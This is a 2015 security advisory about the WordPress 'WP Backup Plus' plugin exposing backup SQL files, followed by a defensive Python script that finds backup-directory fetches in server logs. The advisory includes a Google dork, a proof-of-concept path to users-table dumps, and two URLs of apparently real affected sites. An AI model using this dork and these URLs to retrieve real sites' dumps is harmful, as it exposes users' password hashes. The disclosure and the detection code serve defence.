
WordPress Backup Plus Backup Disclosure

Posted on 21 May 2015

# WordPress 'WP Backup Plus' Plugin Exposure of Backup File to Unauthorized Control
# CWE: CWE-530
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 15/05/2015
# Vendor Homepage: http://wpbackupplus.com/
# Google Dork: inurl:/wp-content/uploads/wp-backup-plus/
# PoC: http://SITE.COM/wp-content/uploads/wp-backup-plus/temp/wp_users.sql OR "Other Table Name".
# Examples:
http://easy-family-boating-recipes.com/wp-content/uploads/wp-backup-plus/temp/cnb24p_users.sql
http://bestsolarpanelsmelbourne.com.au/wp-content/uploads/wp-backup-plus/temp/wp_users.sql
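For site owners checking whether a backup under this directory was already retrieved, the following added example (not part of the original advisory) triages a web server access log for requests below `/wp-content/uploads/wp-backup-plus/` and separates probes from responses that actually served a file. It assumes the Apache/nginx "combined" log format; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Directory named in the advisory; anything served from below it is a backup artifact.
BACKUP_DIR = "/wp-content/uploads/wp-backup-plus/"

# Assumption: Apache/nginx "combined" access-log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def find_backup_fetches(lines):
    """Return one record per request below BACKUP_DIR.

    'served' is True when the response was 200/206 with a body, meaning the
    file actually left the server instead of merely being probed.
    """
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        # Drop the query string, decode %xx escapes, collapse "//", fold case.
        path = unquote(m["target"].split("?", 1)[0])
        path = re.sub(r"/{2,}", "/", path).lower()
        # Substring match so installs in a subdirectory (/blog/wp-content/...) count.
        if BACKUP_DIR not in path:
            continue
        size = 0 if m["size"] == "-" else int(m["size"])
        hits.append({
            "ip": m["ip"], "time": m["ts"], "path": path, "status": int(m["status"]),
            "served": m["status"] in ("200", "206") and size > 0,
        })
    return hits

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [16/May/2015:10:01:02 +0000] "GET /wp-content/uploads/wp-backup-plus/temp/wp_users.sql HTTP/1.1" 200 48211 "-" "curl/7.40"',
    '198.51.100.9 - - [16/May/2015:10:05:40 +0000] "GET /wp-content/uploads/wp-backup-plus/temp/wp_options.sql HTTP/1.1" 403 199 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [16/May/2015:10:07:13 +0000] "GET /wp-content/uploads/2015/05/photo.jpg HTTP/1.1" 200 90211 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [16/May/2015:10:09:55 +0000] "GET /blog//wp-content/uploads/WP-Backup-Plus/temp/wp%5Fusers.sql?x=1 HTTP/1.1" 206 1024 "-" "curl/7.40"',
]

if __name__ == "__main__":
    for h in find_backup_fetches(SAMPLE_LOG):
        print("SERVED" if h["served"] else "probe ", h["status"], h["ip"], h["time"], h["path"])
```

Any record marked as served means the dump's contents, including the password hashes in a users table, should be treated as disclosed.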

 
